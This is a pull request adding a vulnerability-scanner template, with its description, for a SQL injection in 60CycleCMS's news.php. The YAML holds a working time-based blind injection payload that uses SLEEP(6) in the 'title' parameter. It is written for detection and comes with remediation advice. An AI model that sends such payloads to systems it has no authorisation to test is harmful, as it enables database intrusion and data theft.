### PR TITLE
Add CVE-2020-37110 - 60CycleCMS SQL Injection

### DIFF
--- a/http/cves/2020/CVE-2020-37110.yaml
+++ b/http/cves/2020/CVE-2020-37110.yaml
@@ -1,0 +1,42 @@
+id: CVE-2020-37110
+
+info:
+  name: 60CycleCMS 2.5.2 - SQL Injection in news.php
+  author: bswearingen
+  severity: high
+  description: |
+    60CycleCMS 2.5.2 contains an SQL injection vulnerability in news.php and common/lib.php that allows attackers to manipulate database queries through unvalidated user input. Attackers can exploit vulnerable query parameters like 'title' to inject malicious SQL code and potentially extract or modify database contents.
+  impact: |
+    Remote attackers can extract sensitive data from the database through SQL injection.
+  remediation: |
+    Apply input validation and parameterized queries to all user supplied parameters.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-37110
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2020-37110
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: 60cyclecms
+    product: 60cyclecms
+  tags: cve,cve2020,60cyclecms,sqli,unauth
+
+http:
+  - raw:
+      - |
+        GET /news.php?title=test%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a)--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2020-37110, a SQL injection vulnerability in 60CycleCMS.

### Vulnerability Details

**Product:** 60CycleCMS
**Affected Versions:** 2.5.2
**Severity:** High (CVSS 8.2)
**CWE:** CWE-89 (SQL Injection)

The `title` parameter in `news.php` (and related functions in `common/lib.php`) is passed to database queries without sanitization. Remote attackers can inject malicious SQL through this parameter to extract or modify database contents.

### Detection Method

Time-based blind SQL injection via the `title` parameter in `news.php`. The template injects a `SLEEP(6)` payload and measures the response delay to confirm exploitability.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2020-37110